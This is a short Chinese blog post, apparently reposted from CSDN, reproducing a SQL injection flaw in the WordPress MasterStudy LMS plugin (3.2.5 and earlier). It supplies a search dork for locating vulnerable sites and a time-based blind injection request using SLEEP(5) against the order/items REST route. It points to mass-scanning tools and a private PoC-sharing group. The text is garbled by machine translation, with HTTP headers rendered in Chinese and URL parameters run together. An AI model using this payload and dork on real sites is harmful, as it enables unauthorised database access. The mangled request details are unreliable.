【漏洞复现】WordPress MasterStudy LMS插件 SQL注入漏洞(有sql注入漏洞的网站)

【漏洞复现】WordPress MasterStudy LMS插件 SQL注入漏洞0x01 产品简介
WordPress 和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博

0x01 产品简介

WordPress 和WordPress 插件都是WordPress 基金会的产品。 WordPress是一个使用PHP语言开发的博客平台。该平台支持PHP和

在MySQL服务器上建立个人博客网站。 WordPress 插件是应用程序插件。

0x02 漏洞概述

WordPress 插件MasterStudy LMS 版本3.2.5 及更早版本存在安全漏洞。由于用户提供的参数转义不充分,此漏洞允许通过/lms/stm-lms/传递基于联合的用户参数。订单/商品REST 路线。

0x03 搜索语法

body=\’wp-content/plugins/masterstudy-lms-learning-management-system/\’

0x04 漏洞复现

GET /?rest_route=/lms/stm-lms/order/itemsauthor_id=1user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1

Host:你的IP

User-Agent: Mozilla/5.0(Linux、Android 11、motorola Edge 20 fusion) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/101.0.4951.61 Mobile Safari/537.36

接受-Charset: utf-8

Accept-Encoding: gzip、deflate

关闭连接:

5 秒延迟x2

验证SQL 映射

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

使用VX扫描并加入我们内部的POC脚本共享圈。

#【漏洞复现】以上有关WordPress MasterStudy LMS插件SQL注入漏洞的相关内容仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91786.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月23日 下午4:03
下一篇 2024年6月23日 下午4:19

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注